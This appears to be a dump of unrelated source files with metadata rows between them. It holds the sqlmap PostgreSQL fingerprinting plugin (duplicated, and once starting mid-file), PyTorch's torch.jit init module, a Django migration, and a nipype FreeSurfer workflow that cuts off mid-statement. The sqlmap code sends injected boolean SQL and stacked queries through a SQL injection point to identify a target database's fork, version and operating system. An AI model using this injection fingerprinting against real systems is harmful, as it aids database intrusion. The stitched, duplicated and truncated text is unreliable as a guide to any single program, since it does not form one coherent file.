Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):
Backend.setVersionList([">= 8.4.0", "< 9.0.0"])
elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
Backend.setVersionList([">= 8.3.0", "< 8.4.0"])
elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"):
Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"):
Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"):
Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"):
Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"):
Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"):
Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
elif inject.checkBooleanExpression("VERSION()=VERSION()"):
Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"):
Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"):
Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
else:
Backend.setVersion("< 6.2.0")
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
def checkDbmsOs(self, detailed=False):
if Backend.getOs():
return
infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg)
self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
# Windows executables should always have ' Visual C++' or ' mingw'
# patterns within the banner
osWindows = (" Visual C++", "mingw")
for osPattern in osWindows:
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%" + osPattern + "%')>0"
if inject.checkBooleanExpression(query):
Backend.setOs(OS.WINDOWS)
break
if Backend.getOs() is None:
Backend.setOs(OS.LINUX)
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
logger.info(infoMsg)
self.cleanup(onlyFileTbl=True)
| 42.607143 | 237 | 0.588433 |
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import FORK
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.PGSQL)
def getFingerprint(self):
fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
if fork is None:
if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
fork = FORK.COCKROACHDB
elif inject.checkBooleanExpression("VERSION() LIKE '%Redshift%'"):
fork = FORK.REDSHIFT
elif inject.checkBooleanExpression("VERSION() LIKE '%Greenplum%'"):
fork = FORK.GREENPLUM
elif inject.checkBooleanExpression("VERSION() LIKE '%Yellowbrick%'"):
fork = FORK.YELLOWBRICK
elif inject.checkBooleanExpression("VERSION() LIKE '%EnterpriseDB%'"):
fork = FORK.ENTERPRISEDB
elif inject.checkBooleanExpression("VERSION() LIKE '%YB-%'"): fork = FORK.YUGABYTEDB
elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"):
fork = FORK.AURORA
else:
fork = ""
hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
value += DBMS.PGSQL
if fork:
value += " (%s fork)" % fork
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
if banVer:
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if fork:
value += "\n%sfork fingerprint: %s" % (blank, fork)
return value
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
setDbms(DBMS.PGSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
if inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
Backend.setVersion(">= 13.0")
elif inject.checkBooleanExpression("SINH(0)=0"):
Backend.setVersion(">= 12.0")
elif inject.checkBooleanExpression("SHA256(NULL) IS NULL"):
Backend.setVersion(">= 11.0")
elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
Backend.setVersionList([">= 10.0", "< 11.0"])
elif inject.checkBooleanExpression("SIND(0)=0"):
Backend.setVersionList([">= 9.6.0", "< 10.0"])
elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):
Backend.setVersionList([">= 8.4.0", "< 9.0.0"])
elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
Backend.setVersionList([">= 8.3.0", "< 8.4.0"])
elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"):
Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"):
Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"):
Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"):
Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"):
Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"):
Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
elif inject.checkBooleanExpression("VERSION()=VERSION()"):
Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"):
Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"):
Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
else:
Backend.setVersion("< 6.2.0")
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
def checkDbmsOs(self, detailed=False):
if Backend.getOs():
return
infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg)
self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
osWindows = (" Visual C++", "mingw")
for osPattern in osWindows:
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%" + osPattern + "%')>0"
if inject.checkBooleanExpression(query):
Backend.setOs(OS.WINDOWS)
break
if Backend.getOs() is None:
Backend.setOs(OS.LINUX)
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
logger.info(infoMsg)
self.cleanup(onlyFileTbl=True)
| true | true |
f7fa58bd3643415f06359217c1633d15d0f8ee98 | 6,463 | py | Python | torch/jit/__init__.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | torch/jit/__init__.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | torch/jit/__init__.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | import torch._C
from contextlib import contextmanager
from typing import Iterator
from torch.utils import set_module
# These are imported so users can access them from the `torch.jit` module
from torch._jit_internal import (
Final,
Future,
_IgnoreContextManager,
_overload,
_overload_method,
ignore,
_isinstance,
is_scripting,
export,
unused,
)
from torch.jit._script import (
script,
Attribute,
ScriptModule,
script_method,
RecursiveScriptClass,
RecursiveScriptModule,
ScriptWarning,
interface,
CompilationUnit,
ScriptFunction,
_ScriptProfile,
_unwrap_optional,
)
from torch.jit._trace import (
trace,
trace_module,
TracedModule,
TracerWarning,
TracingCheckError,
is_tracing,
ONNXTracedModule,
TopLevelTracedModule,
_unique_state_dict,
_flatten,
_script_if_tracing,
_get_trace_graph,
)
from torch.jit._async import fork, wait
from torch.jit._serialization import save, load
from torch.jit._fuser import optimized_execution, fuser, last_executed_optimized_graph
from torch.jit._freeze import freeze, optimize_for_inference, run_frozen_optimizations
# For backwards compatibility
_fork = fork
_wait = wait
def export_opnames(m):
r"""
Generates new bytecode for a Script module and returns what the op list
would be for a Script Module based off the current code base. If you
have a LiteScriptModule and want to get the currently present
list of ops call _export_operator_list instead.
"""
return torch._C._export_opnames(m._c)
# torch.jit.Error
Error = torch._C.JITException
set_module(Error, "torch.jit")
# This is not perfect but works in common cases
Error.__name__ = "Error"
Error.__qualname__ = "Error"
# for use in python if using annotate
def annotate(the_type, the_value):
"""
This method is a pass-through function that returns `the_value`, used to hint TorchScript
compiler the type of `the_value`. It is a no-op when running outside of TorchScript.
Though TorchScript can infer correct type for most Python expressions, there are some cases where
type inference can be wrong, including:
- Empty containers like `[]` and `{}`, which TorchScript assumes to be container of `Tensor`
- Optional types like `Optional[T]` but assigned a valid value of type `T`, TorchScript would assume
it is type `T` rather than `Optional[T]`
Note that `annotate()` does not help in `__init__` method of `torch.nn.Module` subclasses because it
is executed in eager mode. To annotate types of `torch.nn.Module` attributes,
use :meth:`~torch.jit.Annotate` instead.
Example:
.. testcode::
import torch
from typing import Dict
@torch.jit.script
def fn():
# Telling TorchScript that this empty dictionary is a (str -> int) dictionary
# instead of default dictionary type of (str -> Tensor).
d = torch.jit.annotate(Dict[str, int], {})
# Without `torch.jit.annotate` above, following statement would fail because of
# type mismatch.
d["name"] = 20
.. testcleanup::
del fn
Args:
the_type: Python type that should be passed to TorchScript compiler as type hint for `the_value`
the_value: Value or expression to hint type for.
Returns:
`the_value` is passed back as return value.
"""
return the_value
def script_if_tracing(fn):
"""
Compiles ``fn`` when it is first called during tracing. ``torch.jit.script``
has a non-negligible start up time when it is first called due to
lazy-initializations of many compiler builtins. Therefore you should not use
it in library code. However, you may want to have parts of your library work
in tracing even if they use control flow. In these cases, you should use
``@torch.jit.script_if_tracing`` to substitute for
``torch.jit.script``.
Args:
fn: A function to compile.
Returns:
If called during tracing, a :class:`ScriptFunction` created by `torch.jit.script` is returned.
Otherwise, the original function `fn` is returned.
"""
return _script_if_tracing(fn)
# for torch.jit.isinstance
def isinstance(obj, target_type):
"""
This function provides for conatiner type refinement in TorchScript. It can refine
parameterized containers of the List, Dict, Tuple, and Optional types. E.g. ``List[str]``,
``Dict[str, List[torch.Tensor]]``, ``Optional[Tuple[int,str,int]]``. It can also
refine basic types such as bools and ints that are available in TorchScript.
Args:
obj: object to refine the type of
target_type: type to try to refine obj to
Returns:
``bool``: True if obj was successfully refined to the type of target_type,
False otherwise with no new type refinement
Example (using ``torch.jit.isinstance`` for type refinement):
.. testcode::
import torch
from typing import Any, Dict, List
class MyModule(torch.nn.Module):
def __init__(self):
super(MyModule, self).__init__()
def forward(self, input: Any): # note the Any type
if torch.jit.isinstance(input, List[torch.Tensor]):
for t in input:
y = t.clamp(0, 0.5)
elif torch.jit.isinstance(input, Dict[str, str]):
for val in input.values():
print(val)
m = torch.jit.script(MyModule())
x = [torch.rand(3,3), torch.rand(4,3)]
m(x)
y = {"key1":"val1","key2":"val2"}
m(y)
"""
return _isinstance(obj, target_type)
# Context manager for globally hiding source ranges when printing graphs.
# Note that these functions are exposed to Python as static members of the
# Graph class, so mypy checks need to be skipped.
@contextmanager
def _hide_source_ranges() -> Iterator[None]:
old_enable_source_ranges = torch._C.Graph.global_print_source_ranges # type: ignore[attr-defined]
try:
torch._C.Graph.set_global_print_source_ranges(False) # type: ignore[attr-defined]
yield
finally:
torch._C.Graph.set_global_print_source_ranges(old_enable_source_ranges) # type: ignore[attr-defined]
if not torch._C._jit_init():
raise RuntimeError("JIT initialization failed")
| 31.837438 | 109 | 0.677704 | import torch._C
from contextlib import contextmanager
from typing import Iterator
from torch.utils import set_module
from torch._jit_internal import (
Final,
Future,
_IgnoreContextManager,
_overload,
_overload_method,
ignore,
_isinstance,
is_scripting,
export,
unused,
)
from torch.jit._script import (
script,
Attribute,
ScriptModule,
script_method,
RecursiveScriptClass,
RecursiveScriptModule,
ScriptWarning,
interface,
CompilationUnit,
ScriptFunction,
_ScriptProfile,
_unwrap_optional,
)
from torch.jit._trace import (
trace,
trace_module,
TracedModule,
TracerWarning,
TracingCheckError,
is_tracing,
ONNXTracedModule,
TopLevelTracedModule,
_unique_state_dict,
_flatten,
_script_if_tracing,
_get_trace_graph,
)
from torch.jit._async import fork, wait
from torch.jit._serialization import save, load
from torch.jit._fuser import optimized_execution, fuser, last_executed_optimized_graph
from torch.jit._freeze import freeze, optimize_for_inference, run_frozen_optimizations
_fork = fork
_wait = wait
def export_opnames(m):
return torch._C._export_opnames(m._c)
Error = torch._C.JITException
set_module(Error, "torch.jit")
Error.__name__ = "Error"
Error.__qualname__ = "Error"
def annotate(the_type, the_value):
return the_value
def script_if_tracing(fn):
return _script_if_tracing(fn)
def isinstance(obj, target_type):
return _isinstance(obj, target_type)
@contextmanager
def _hide_source_ranges() -> Iterator[None]:
old_enable_source_ranges = torch._C.Graph.global_print_source_ranges
try:
torch._C.Graph.set_global_print_source_ranges(False)
yield
finally:
torch._C.Graph.set_global_print_source_ranges(old_enable_source_ranges)
if not torch._C._jit_init():
raise RuntimeError("JIT initialization failed")
| true | true |
f7fa590bbaf628ff0d821095d8057efca299ba7b | 1,588 | py | Python | scholariumat/products/migrations/0002_auto_20180924_1351.py | valuehack/scholariumat | 47c13f3429b95b9ad5ca59b45cf971895260bb5c | [
"MIT"
] | null | null | null | scholariumat/products/migrations/0002_auto_20180924_1351.py | valuehack/scholariumat | 47c13f3429b95b9ad5ca59b45cf971895260bb5c | [
"MIT"
] | 232 | 2018-06-30T11:40:52.000Z | 2020-04-29T23:55:41.000Z | scholariumat/products/migrations/0002_auto_20180924_1351.py | valuehack/scholariumat | 47c13f3429b95b9ad5ca59b45cf971895260bb5c | [
"MIT"
] | 3 | 2018-05-31T12:57:03.000Z | 2020-02-27T16:25:44.000Z | # Generated by Django 2.0.8 on 2018-09-24 11:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('users', '0001_initial'),
('products', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='purchase',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Profile'),
),
migrations.AddField(
model_name='item',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Product'),
),
migrations.AddField(
model_name='item',
name='requests',
field=models.ManyToManyField(blank=True, editable=False, related_name='item_requests', to='users.Profile'),
),
migrations.AddField(
model_name='item',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ItemType', verbose_name='Typ'),
),
migrations.AddField(
model_name='fileattachment',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Item'),
),
migrations.AddField(
model_name='fileattachment',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='products.AttachmentType'),
),
]
| 33.083333 | 125 | 0.602645 |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('users', '0001_initial'),
('products', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='purchase',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Profile'),
),
migrations.AddField(
model_name='item',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Product'),
),
migrations.AddField(
model_name='item',
name='requests',
field=models.ManyToManyField(blank=True, editable=False, related_name='item_requests', to='users.Profile'),
),
migrations.AddField(
model_name='item',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ItemType', verbose_name='Typ'),
),
migrations.AddField(
model_name='fileattachment',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Item'),
),
migrations.AddField(
model_name='fileattachment',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='products.AttachmentType'),
),
]
| true | true |
f7fa593a4995e101544e3415266dad0ef673d73c | 28,316 | py | Python | nipype/workflows/smri/freesurfer/recon.py | felixsc1/nipype | e722d6170593583f16ddfcb95473e5d30b5f1d7c | [
"Apache-2.0"
] | 8 | 2019-05-29T09:38:30.000Z | 2021-01-20T03:36:59.000Z | nipype/workflows/smri/freesurfer/recon.py | felixsc1/nipype | e722d6170593583f16ddfcb95473e5d30b5f1d7c | [
"Apache-2.0"
] | 12 | 2021-03-09T03:01:16.000Z | 2022-03-11T23:59:36.000Z | nipype/workflows/smri/freesurfer/recon.py | felixsc1/nipype | e722d6170593583f16ddfcb95473e5d30b5f1d7c | [
"Apache-2.0"
] | 1 | 2020-07-17T12:49:49.000Z | 2020-07-17T12:49:49.000Z | # -*- coding: utf-8 -*-
from __future__ import (print_function, division, unicode_literals,
absolute_import)
from ....pipeline import engine as pe
from ....interfaces import freesurfer as fs
from ....interfaces import utility as niu
from .autorecon1 import create_AutoRecon1
from .autorecon2 import create_AutoRecon2
from .autorecon3 import create_AutoRecon3
from ....interfaces.freesurfer import AddXFormToHeader, Info
from ....interfaces.io import DataSink
from .utils import getdefaultconfig
from .... import logging
logger = logging.getLogger('nipype.workflow')
def create_skullstripped_recon_flow(name="skullstripped_recon_all"):
"""Performs recon-all on voulmes that are already skull stripped.
FreeSurfer failes to perform skullstrippig on some volumes (especially
MP2RAGE). This can be avoided by doing skullstripping before running
recon-all (using for example SPECTRE algorithm).
Example
-------
>>> from nipype.workflows.smri.freesurfer import create_skullstripped_recon_flow
>>> recon_flow = create_skullstripped_recon_flow()
>>> recon_flow.inputs.inputspec.subject_id = 'subj1'
>>> recon_flow.inputs.inputspec.T1_files = 'T1.nii.gz'
>>> recon_flow.run() # doctest: +SKIP
Inputs::
inputspec.T1_files : skullstripped T1_files (mandatory)
inputspec.subject_id : freesurfer subject id (optional)
inputspec.subjects_dir : freesurfer subjects directory (optional)
Outputs::
outputspec.subject_id : freesurfer subject id
outputspec.subjects_dir : freesurfer subjects directory
"""
wf = pe.Workflow(name=name)
inputnode = pe.Node(
niu.IdentityInterface(
fields=['subject_id', 'subjects_dir', 'T1_files']),
name='inputspec')
autorecon1 = pe.Node(fs.ReconAll(), name="autorecon1")
autorecon1.plugin_args = {'submit_specs': 'request_memory = 2500'}
autorecon1.inputs.directive = "autorecon1"
autorecon1.inputs.args = "-noskullstrip"
autorecon1._interface._can_resume = False
wf.connect(inputnode, "T1_files", autorecon1, "T1_files")
wf.connect(inputnode, "subjects_dir", autorecon1, "subjects_dir")
wf.connect(inputnode, "subject_id", autorecon1, "subject_id")
def link_masks(subjects_dir, subject_id):
import os
os.symlink(
os.path.join(subjects_dir, subject_id, "mri", "T1.mgz"),
os.path.join(subjects_dir, subject_id, "mri",
"brainmask.auto.mgz"))
os.symlink(
os.path.join(subjects_dir, subject_id, "mri",
"brainmask.auto.mgz"),
os.path.join(subjects_dir, subject_id, "mri", "brainmask.mgz"))
return subjects_dir, subject_id
masks = pe.Node(
niu.Function(
input_names=['subjects_dir', 'subject_id'],
output_names=['subjects_dir', 'subject_id'],
function=link_masks),
name="link_masks")
wf.connect(autorecon1, "subjects_dir", masks, "subjects_dir")
wf.connect(autorecon1, "subject_id", masks, "subject_id")
autorecon_resume = pe.Node(fs.ReconAll(), name="autorecon_resume")
autorecon_resume.plugin_args = {'submit_specs': 'request_memory = 2500'}
autorecon_resume.inputs.args = "-no-isrunning"
wf.connect(masks, "subjects_dir", autorecon_resume, "subjects_dir")
wf.connect(masks, "subject_id", autorecon_resume, "subject_id")
outputnode = pe.Node(
niu.IdentityInterface(fields=['subject_id', 'subjects_dir']),
name='outputspec')
wf.connect(autorecon_resume, "subjects_dir", outputnode, "subjects_dir")
wf.connect(autorecon_resume, "subject_id", outputnode, "subject_id")
return wf
def create_reconall_workflow(name="ReconAll", plugin_args=None):
"""Creates the ReconAll workflow in Nipype. This workflow is designed to
run the same commands as FreeSurfer's reconall script but with the added
features that a Nipype workflow provides. Before running this workflow, it
is necessary to have the FREESURFER_HOME environmental variable set to the
directory containing the version of FreeSurfer to be used in this workflow.
Example
-------
>>> from nipype.workflows.smri.freesurfer import create_reconall_workflow
>>> recon_all = create_reconall_workflow()
>>> recon_all.inputs.inputspec.subject_id = 'subj1'
>>> recon_all.inputs.inputspec.subjects_dir = '.'
>>> recon_all.inputs.inputspec.T1_files = 'T1.nii.gz'
>>> recon_all.run() # doctest: +SKIP
Inputs::
inputspec.subjects_dir : subjects directory (mandatory)
inputspec.subject_id : name of subject (mandatory)
inputspec.T1_files : T1 files (mandatory)
inputspec.T2_file : T2 file (optional)
inputspec.FLAIR_file : FLAIR file (optional)
inputspec.cw256 : Conform inputs to 256 FOV (optional)
inputspec.num_threads: Number of threads on nodes that utilize OpenMP (default=1)
plugin_args : Dictionary of plugin args to set to nodes that utilize OpenMP (optional)
Outputs::
postdatasink_outputspec.subject_id : name of the datasinked output folder in the subjects directory
Note:
The input subject_id is not passed to the commands in the workflow. Commands
that require subject_id are reading implicit inputs from
{SUBJECTS_DIR}/{subject_id}. For those commands the subject_id is set to the
default value and SUBJECTS_DIR is set to the node directory. The implicit
inputs are then copied to the node directory in order to mimic a SUBJECTS_DIR
structure. For example, if the command implicitly reads in brainmask.mgz, the
interface would copy that input file to
{node_dir}/{subject_id}/mri/brainmask.mgz and set SUBJECTS_DIR to node_dir.
The workflow only uses the input subject_id to datasink the outputs to
{subjects_dir}/{subject_id}.
"""
reconall = pe.Workflow(name=name)
inputspec = pe.Node(
niu.IdentityInterface(fields=[
'subject_id', 'subjects_dir', 'T1_files', 'T2_file', 'FLAIR_file',
'num_threads', 'cw256', 'reg_template', 'reg_template_withskull',
'lh_atlas', 'rh_atlas', 'lh_classifier1', 'rh_classifier1',
'lh_classifier2', 'rh_classifier2', 'lh_classifier3',
'rh_classifier3', 'lookup_table', 'wm_lookup_table',
'src_subject_id', 'src_subject_dir', 'color_table', 'awk_file'
]),
run_without_submitting=True,
name='inputspec')
# check freesurfer version and set parameters
fs_version_full = Info.version()
if fs_version_full and ('v6.0' in fs_version_full
or 'dev' in fs_version_full):
# assuming that dev is 6.0
fsvernum = 6.0
fs_version = 'v6.0'
th3 = True
shrink = 2
distance = 200 # 3T should be 50
stop = 0.0001
exvivo = True
entorhinal = True
rb_date = "2014-08-21"
else:
# 5.3 is default
fsvernum = 5.3
if fs_version_full:
if 'v5.3' in fs_version_full:
fs_version = 'v5.3'
else:
fs_version = fs_version_full.split('-')[-1]
logger.info(("Warning: Workflow may not work properly if "
"FREESURFER_HOME environmental variable is not "
"set or if you are using an older version of "
"FreeSurfer"))
else:
fs_version = 5.3 # assume version 5.3
th3 = False
shrink = None
distance = 50
stop = None
exvivo = False
entorhinal = False
rb_date = "2008-03-26"
logger.info("FreeSurfer Version: {0}".format(fs_version))
def setconfig(reg_template=None,
reg_template_withskull=None,
lh_atlas=None,
rh_atlas=None,
lh_classifier1=None,
rh_classifier1=None,
lh_classifier2=None,
rh_classifier2=None,
lh_classifier3=None,
rh_classifier3=None,
src_subject_id=None,
src_subject_dir=None,
color_table=None,
lookup_table=None,
wm_lookup_table=None,
awk_file=None,
rb_date=None):
"""Set optional configurations to the default"""
def checkarg(arg, default):
"""Returns the value if defined; otherwise default"""
if arg:
return arg
else:
return default
defaultconfig = getdefaultconfig(exitonfail=True, rb_date=rb_date)
# set the default template and classifier files
reg_template = checkarg(reg_template,
defaultconfig['registration_template'])
reg_template_withskull = checkarg(
reg_template_withskull,
defaultconfig['registration_template_withskull'])
lh_atlas = checkarg(lh_atlas, defaultconfig['lh_atlas'])
rh_atlas = checkarg(rh_atlas, defaultconfig['rh_atlas'])
lh_classifier1 = checkarg(lh_classifier1,
defaultconfig['lh_classifier'])
rh_classifier1 = checkarg(rh_classifier1,
defaultconfig['rh_classifier'])
lh_classifier2 = checkarg(lh_classifier2,
defaultconfig['lh_classifier2'])
rh_classifier2 = checkarg(rh_classifier2,
defaultconfig['rh_classifier2'])
lh_classifier3 = checkarg(lh_classifier3,
defaultconfig['lh_classifier3'])
rh_classifier3 = checkarg(rh_classifier3,
defaultconfig['rh_classifier3'])
src_subject_id = checkarg(src_subject_id,
defaultconfig['src_subject_id'])
src_subject_dir = checkarg(src_subject_dir,
defaultconfig['src_subject_dir'])
color_table = checkarg(color_table, defaultconfig['AvgColorTable'])
lookup_table = checkarg(lookup_table, defaultconfig['LookUpTable'])
wm_lookup_table = checkarg(wm_lookup_table,
defaultconfig['WMLookUpTable'])
awk_file = checkarg(awk_file, defaultconfig['awk_file'])
return reg_template, reg_template_withskull, lh_atlas, rh_atlas, \
lh_classifier1, rh_classifier1, lh_classifier2, rh_classifier2, \
lh_classifier3, rh_classifier3, src_subject_id, src_subject_dir, \
color_table, lookup_table, wm_lookup_table, awk_file
# list of params to check
params = [
'reg_template', 'reg_template_withskull', 'lh_atlas', 'rh_atlas',
'lh_classifier1', 'rh_classifier1', 'lh_classifier2', 'rh_classifier2',
'lh_classifier3', 'rh_classifier3', 'src_subject_id',
'src_subject_dir', 'color_table', 'lookup_table', 'wm_lookup_table',
'awk_file'
]
config_node = pe.Node(
niu.Function(params + ['rb_date'], params, setconfig), name="config")
config_node.inputs.rb_date = rb_date
for param in params:
reconall.connect(inputspec, param, config_node, param)
# create AutoRecon1
ar1_wf, ar1_outputs = create_AutoRecon1(
plugin_args=plugin_args,
stop=stop,
distance=distance,
shrink=shrink,
fsvernum=fsvernum)
# connect inputs for AutoRecon1
reconall.connect([(inputspec, ar1_wf, [
